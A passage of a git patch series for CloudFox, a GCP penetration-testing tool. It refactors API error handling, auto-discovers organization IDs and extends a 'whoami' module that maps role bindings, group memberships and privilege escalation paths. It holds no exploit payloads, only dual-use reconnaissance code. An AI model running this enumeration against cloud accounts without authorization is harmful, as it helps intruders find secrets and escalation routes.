Pub/Sub service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } var subscriptions []SubscriptionInfo @@ -136,7 +137,7 @@ func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, er }) if err != nil { - return nil, fmt.Errorf("failed to list subscriptions: %v", err) + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } return subscriptions, nil diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go index 96eabcc4..69b617a7 100644 --- a/gcp/services/schedulerService/schedulerService.go +++ b/gcp/services/schedulerService/schedulerService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" scheduler "google.golang.org/api/cloudscheduler/v1" ) @@ -53,7 +54,7 @@ func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { service, err := scheduler.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Scheduler service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") } var jobs []JobInfo @@ -71,7 +72,7 @@ func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list jobs: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") } return jobs, nil diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 14af72d3..e9ff9357 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -68,7 +68,7 @@ func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { client, err = secretmanager.NewClient(ctx) } if err != nil { - return SecretsService{}, fmt.Errorf("failed to create secret manager client: %v", err) + return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } ss := SecretsService{ @@ -148,7 +148,7 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { break } if err != nil { - return nil, fmt.Errorf("failed to list secrets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } secret := SecretInfo{ diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go index 52531c6a..363c1faf 100644 --- a/gcp/services/serviceAgentsService/serviceAgentsService.go +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" ) @@ -111,7 +112,7 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen ctx := context.Background() service, err := cloudresourcemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create resource manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } var agents []ServiceAgentInfo @@ -119,7 +120,7 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen // Get IAM policy policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get IAM policy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Track which service agents we've seen diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go index 3ad1c7b0..5efa078f 100644 --- a/gcp/services/sourceReposService/sourceReposService.go +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" sourcerepo "google.golang.org/api/sourcerepo/v1" ) @@ -33,7 +34,7 @@ func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { ctx := context.Background() service, err := sourcerepo.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Source Repo service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") } var repos []RepoInfo @@ -41,7 +42,7 @@ func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { parent := fmt.Sprintf("projects/%s", projectID) resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list repos: %v", err) + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") } for _, repo := range resp.Repos { diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go index 4bc6d57d..0e3b2457 100644 --- a/gcp/services/spannerService/spannerService.go +++ b/gcp/services/spannerService/spannerService.go @@ -31,7 +31,7 @@ func (s *SpannerService) ListInstances(projectID string) ([]SpannerInstanceInfo, ctx := context.Background() service, err := spanner.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Spanner service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") } var instances []SpannerInstanceInfo diff --git a/gcp/services/sshOsLoginService/sshOsLoginService.go b/gcp/services/sshOsLoginService/sshOsLoginService.go index b43c1118..4a194024 100644 --- a/gcp/services/sshOsLoginService/sshOsLoginService.go +++ b/gcp/services/sshOsLoginService/sshOsLoginService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" compute "google.golang.org/api/compute/v1" oslogin "google.golang.org/api/oslogin/v1" ) @@ -70,7 +71,7 @@ func (s *SSHOsLoginService) GetProjectOSLoginConfig(projectID string) (*OSLoginC ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } config := &OSLoginConfig{ @@ -80,7 +81,7 @@ func (s *SSHOsLoginService) GetProjectOSLoginConfig(projectID string) (*OSLoginC project, err := service.Projects.Get(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get project: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } // Check common instance metadata @@ -114,14 +115,14 @@ func (s *SSHOsLoginService) GetProjectSSHKeys(projectID string) ([]SSHKeyInfo, e ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var keys []SSHKeyInfo project, err := service.Projects.Get(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get project: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } if project.CommonInstanceMetadata != nil { @@ -141,7 +142,7 @@ func (s *SSHOsLoginService) GetInstanceSSHAccess(projectID string) ([]InstanceSS ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var instances []InstanceSSHAccess @@ -223,7 +224,7 @@ func (s *SSHOsLoginService) GetOSLoginUsers(projectID string) ([]OSLoginUser, er ctx := context.Background() _, err := oslogin.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create oslogin service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "oslogin.googleapis.com") } // Note: OS Login API requires querying per-user, so we return empty diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go index 0d08a597..78e7a68d 100644 --- a/gcp/services/vpcService/vpcService.go +++ b/gcp/services/vpcService/vpcService.go @@ -95,14 +95,14 @@ func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var networks []VPCNetworkInfo resp, err := service.Networks.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list VPC networks: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, network := range resp.Items { @@ -125,7 +125,7 @@ func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var subnets []SubnetInfo @@ -141,7 +141,7 @@ func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { return nil }) if err != nil { - return nil, fmt.Errorf("failed to list subnets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } return subnets, nil @@ -159,14 +159,14 @@ func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var peerings []VPCPeeringInfo networks, err := service.Networks.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list networks: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, network := range networks.Items { @@ -208,14 +208,14 @@ func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { service, err = compute.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var routes []RouteInfo resp, err := service.Routes.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list routes: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, route := range resp.Items { diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go index 4134d44a..b07eceac 100644 --- a/gcp/services/vpcscService/vpcscService.go +++ b/gcp/services/vpcscService/vpcscService.go @@ -89,7 +89,7 @@ func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, err service, err = accesscontextmanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } var policies []AccessPolicyInfo @@ -110,7 +110,7 @@ func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, err return nil }) if err != nil { - return nil, fmt.Errorf("failed to list access policies: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } return policies, nil @@ -128,7 +128,7 @@ func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerime service, err = accesscontextmanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } var perimeters []ServicePerimeterInfo @@ -143,7 +143,7 @@ func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerime return nil }) if err != nil { - return nil, fmt.Errorf("failed to list service perimeters: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } return perimeters, nil @@ -161,7 +161,7 @@ func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, e service, err = accesscontextmanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } var levels []AccessLevelInfo @@ -176,7 +176,7 @@ func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, e return nil }) if err != nil { - return nil, fmt.Errorf("failed to list access levels: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } return levels, nil diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go index 76a01fa4..ed498396 100644 --- a/gcp/services/workloadIdentityService/workloadIdentityService.go +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" iam "google.golang.org/api/iam/v1" ) @@ -66,7 +67,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([ iamService, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var pools []WorkloadIdentityPool @@ -92,7 +93,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([ return nil }) if err != nil { - return nil, fmt.Errorf("failed to list workload identity pools: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } return pools, nil @@ -104,7 +105,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolI iamService, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var providers []WorkloadIdentityProvider @@ -150,7 +151,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolI return nil }) if err != nil { - return nil, fmt.Errorf("failed to list workload identity providers: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } return providers, nil @@ -162,7 +163,7 @@ func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string iamService, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var bindings []FederatedIdentityBinding @@ -199,7 +200,7 @@ func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string return nil }) if err != nil { - return nil, fmt.Errorf("failed to find federated identity bindings: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } return bindings, nil diff --git a/internal/gcp/base.go b/internal/gcp/base.go index 9cc695bc..d3a055a6 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -2,6 +2,7 @@ package gcpinternal import ( "context" + "errors" "fmt" "strings" "sync" @@ -9,8 +10,90 @@ import ( "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" + "google.golang.org/api/googleapi" ) +// ------------------------------ +// Common GCP API Error Types +// ------------------------------ +var ( + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") +) + +// ParseGCPError converts GCP API errors into cleaner, standardized error types +// This should be used by all GCP service modules for consistent error handling +func ParseGCPError(err error, apiName string) error { + if err == nil { + return nil + } + + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + errStr := googleErr.Error() + + switch googleErr.Code { + case 403: + // Check for SERVICE_DISABLED first - this is usually the root cause + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Permission denied + if strings.Contains(errStr, "PERMISSION_DENIED") || + strings.Contains(errStr, "does not have") || + strings.Contains(errStr, "permission") { + return ErrPermissionDenied + } + // Generic 403 + return ErrPermissionDenied + + case 404: + return ErrNotFound + + case 400: + return fmt.Errorf("bad request: %s", googleErr.Message) + + case 429: + return fmt.Errorf("rate limited - too many requests") + + case 500, 502, 503, 504: + return fmt.Errorf("GCP service error (code %d)", googleErr.Code) + } + + // Default: return cleaner error message + return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) + } + + return err +} + +// HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue +// Returns false if the error is fatal and the caller should stop processing +func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { + if err == nil { + return true // No error, continue + } + + switch { + case errors.Is(err, ErrAPINotEnabled): + logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) + return false // Can't continue without API enabled + + case errors.Is(err, ErrPermissionDenied): + logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(err, ErrNotFound): + // Not found is often expected, don't log as error + return true + + default: + logger.ErrorM(fmt.Sprintf("%s: %v", resourceDesc, err), moduleName) + return true // Continue with other resources + } +} + // ------------------------------ // CommandContext holds all common initialization data for GCP commands // ------------------------------ diff --git a/internal/log.go b/internal/log.go index 9b89fe4e..007ff275 100644 --- a/internal/log.go +++ b/internal/log.go @@ -72,7 +72,9 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } } func (l *Logger) Fatal(text string) { @@ -81,7 +83,9 @@ func (l *Logger) Fatal(text string) { func (l *Logger) FatalM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } From 333ca05a11995f6436b3ff3784e70cf546b742a8 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 8 Jan 2026 08:50:33 -0500 Subject: [PATCH 07/48] fixed error handling, added auto org detection for vpc, added features to whoami --- gcp/commands/vpcsc.go | 30 ++- gcp/commands/whoami.go | 232 +++++++++++++++--- gcp/services/apikeysService/apikeysService.go | 4 +- .../artifactRegistryService.go | 4 +- .../filestoreService/filestoreService.go | 2 +- gcp/services/iamService/iamService.go | 47 ++-- .../organizationsService.go | 17 ++ go.mod | 2 +- internal/gcp/base.go | 45 ++++ 9 files changed, 328 insertions(+), 55 deletions(-) diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go index a433d10a..16906d3b 100644 --- a/gcp/commands/vpcsc.go +++ b/gcp/commands/vpcsc.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -28,12 +29,12 @@ Features: - Identifies overly permissive configurations - Analyzes ingress/egress policies -Note: Requires organization ID (--org flag) as VPC-SC is org-level.`, +Note: Organization ID is auto-discovered from project ancestry. Use --org flag to override.`, Run: runGCPVPCSCCommand, } func init() { - GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (required)") + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (auto-discovered if not provided)") } type VPCSCModule struct { @@ -60,14 +61,31 @@ func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { return } - if orgID == "" { - cmdCtx.Logger.ErrorM("Organization ID is required. Use --org flag.", globals.GCP_VPCSC_MODULE_NAME) - return + // Auto-discover org ID if not provided + effectiveOrgID := orgID + if effectiveOrgID == "" { + if len(cmdCtx.ProjectIDs) == 0 { + cmdCtx.Logger.ErrorM("No projects discovered and no --org flag provided. Cannot determine organization.", globals.GCP_VPCSC_MODULE_NAME) + return + } + + cmdCtx.Logger.InfoM("Auto-discovering organization ID from project ancestry...", globals.GCP_VPCSC_MODULE_NAME) + orgsSvc := orgsservice.New() + + // Try to get org ID from the first project + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Could not auto-discover organization ID: %v. Use --org flag to specify.", err), globals.GCP_VPCSC_MODULE_NAME) + return + } + + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) } module := &VPCSCModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - OrgID: orgID, + OrgID: effectiveOrgID, Policies: []vpcscservice.AccessPolicyInfo{}, Perimeters: []vpcscservice.ServicePerimeterInfo{}, AccessLevels: []vpcscservice.AccessLevelInfo{}, diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index e64f5386..1dca6e31 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -18,8 +18,9 @@ import ( crmv3 "google.golang.org/api/cloudresourcemanager/v3" ) -// Flag for extended enumeration +// Flags for whoami command var whoamiExtended bool +var whoamiGroups []string var GCPWhoAmICommand = &cobra.Command{ Use: globals.GCP_WHOAMI_MODULE_NAME, @@ -30,17 +31,23 @@ var GCPWhoAmICommand = &cobra.Command{ Default output: - Current identity details (email, type) - Organization and folder context -- Effective role bindings across projects +- Effective role bindings across projects (with inheritance source) With --extended flag (adds): - Service accounts that can be impersonated - Privilege escalation opportunities -- Exploitation commands`, +- Exploitation commands + +With --groups flag: +- Provide known group email addresses when group enumeration is permission denied +- Role bindings from these groups will be included in the output +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com`, Run: runGCPWhoAmICommand, } func init() { GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") + GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") } // ------------------------------ @@ -57,6 +64,8 @@ type IdentityContext struct { Folders []FolderInfo Groups []GroupMembership // Groups the identity is a member of GroupsEnumerated bool // Whether group enumeration was successful + GroupsProvided []string // Groups provided via --groups flag + GroupsMismatch bool // True if provided groups differ from enumerated } type ProjectInfo struct { @@ -80,15 +89,18 @@ type GroupMembership struct { GroupID string // e.g., "groups/abc123" Email string // e.g., "security-team@example.com" DisplayName string // e.g., "Security Team" + Source string // "enumerated" or "provided" } type RoleBinding struct { - Role string - Scope string // "organization", "folder", "project" - ScopeID string - ScopeName string // Display name of the scope resource - Inherited bool - Condition string + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string + InheritedFrom string // Source of binding: "direct", group email, or parent resource + MemberType string // "user", "serviceAccount", "group" } type ImpersonationTarget struct { @@ -119,6 +131,7 @@ type WhoAmIModule struct { DangerousPermissions []string LootMap map[string]*internal.LootFile Extended bool + ProvidedGroups []string // Groups provided via --groups flag mu sync.Mutex } @@ -152,6 +165,7 @@ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { DangerousPermissions: []string{}, LootMap: make(map[string]*internal.LootFile), Extended: whoamiExtended, + ProvidedGroups: whoamiGroups, } // Initialize loot files @@ -175,7 +189,9 @@ func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { oauthService := OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "oauth2.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not retrieve token info") return } @@ -317,18 +333,33 @@ func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger intern // getGroupMemberships retrieves the groups that the current identity is a member of func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Store provided groups + m.Identity.GroupsProvided = m.ProvidedGroups + // Only applicable for user identities (not service accounts) if m.Identity.Type != "user" { m.Identity.GroupsEnumerated = true // N/A for service accounts + // If groups were provided for a service account, add them as provided + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) for service account", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } return } ciService, err := cloudidentity.NewService(ctx) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not create Cloud Identity client") - // GroupsEnumerated stays false - will show "Unknown" + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) return } @@ -338,31 +369,93 @@ func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal. resp, err := ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not fetch group memberships") - // GroupsEnumerated stays false - will show "Unknown" + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) return } // Successfully enumerated groups m.Identity.GroupsEnumerated = true + var enumeratedEmails []string for _, membership := range resp.Memberships { group := GroupMembership{ GroupID: membership.Group, DisplayName: membership.DisplayName, + Source: "enumerated", } if membership.GroupKey != nil { group.Email = membership.GroupKey.Id + enumeratedEmails = append(enumeratedEmails, strings.ToLower(membership.GroupKey.Id)) } m.Identity.Groups = append(m.Identity.Groups, group) } + // Check for mismatch with provided groups + if len(m.ProvidedGroups) > 0 { + m.checkGroupMismatch(enumeratedEmails, logger) + } + if len(m.Identity.Groups) > 0 { logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) } } +// useProvidedGroups adds provided groups when enumeration fails +func (m *WhoAmIModule) useProvidedGroups(logger internal.Logger) { + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) (enumeration failed)", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// checkGroupMismatch compares provided groups with enumerated groups +func (m *WhoAmIModule) checkGroupMismatch(enumeratedEmails []string, logger internal.Logger) { + enumeratedSet := make(map[string]bool) + for _, email := range enumeratedEmails { + enumeratedSet[strings.ToLower(email)] = true + } + + providedSet := make(map[string]bool) + for _, email := range m.ProvidedGroups { + providedSet[strings.ToLower(email)] = true + } + + // Check for provided groups not in enumerated + var notInEnumerated []string + for _, email := range m.ProvidedGroups { + if !enumeratedSet[strings.ToLower(email)] { + notInEnumerated = append(notInEnumerated, email) + } + } + + // Check for enumerated groups not in provided + var notInProvided []string + for _, email := range enumeratedEmails { + if !providedSet[strings.ToLower(email)] { + notInProvided = append(notInProvided, email) + } + } + + if len(notInEnumerated) > 0 || len(notInProvided) > 0 { + m.Identity.GroupsMismatch = true + if len(notInEnumerated) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Provided groups not found in enumerated: %s", strings.Join(notInEnumerated, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + if len(notInProvided) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Enumerated groups not in provided list: %s", strings.Join(notInProvided, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + } +} + // getRoleBindings retrieves IAM role bindings for the current identity func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { iamService := IAMService.New() @@ -376,6 +469,14 @@ func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logg } fullMember := memberPrefix + m.Identity.Email + // Build list of group members to check + groupMembers := make(map[string]string) // group:email -> email for display + for _, group := range m.Identity.Groups { + if group.Email != "" { + groupMembers["group:"+group.Email] = group.Email + } + } + // Get role bindings from each project for _, projectID := range m.ProjectIDs { // Use PrincipalsWithRolesEnhanced which includes inheritance @@ -387,19 +488,25 @@ func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logg continue } - // Find bindings for the current identity + // Find bindings for the current identity (direct) for _, principal := range principals { if principal.Name == fullMember || principal.Email == m.Identity.Email { for _, binding := range principal.PolicyBindings { rb := RoleBinding{ - Role: binding.Role, - Scope: binding.ResourceType, - ScopeID: binding.ResourceID, - Inherited: binding.IsInherited, + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: "direct", + MemberType: m.Identity.Type, } if binding.HasCondition && binding.ConditionInfo != nil { rb.Condition = binding.ConditionInfo.Title } + // Set inherited source if from parent resource + if binding.IsInherited && binding.InheritedFrom != "" { + rb.InheritedFrom = binding.InheritedFrom + } // Check for dangerous permissions if isDangerousRole(binding.Role) { @@ -411,10 +518,50 @@ func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logg m.mu.Unlock() } } + + // Check for group-based bindings + if groupEmail, ok := groupMembers[principal.Name]; ok { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: fmt.Sprintf("group:%s", groupEmail), + MemberType: "group", + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s (via group %s)", binding.Role, binding.ResourceID, groupEmail)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + directCount := 0 + groupCount := 0 + for _, rb := range m.RoleBindings { + if rb.MemberType == 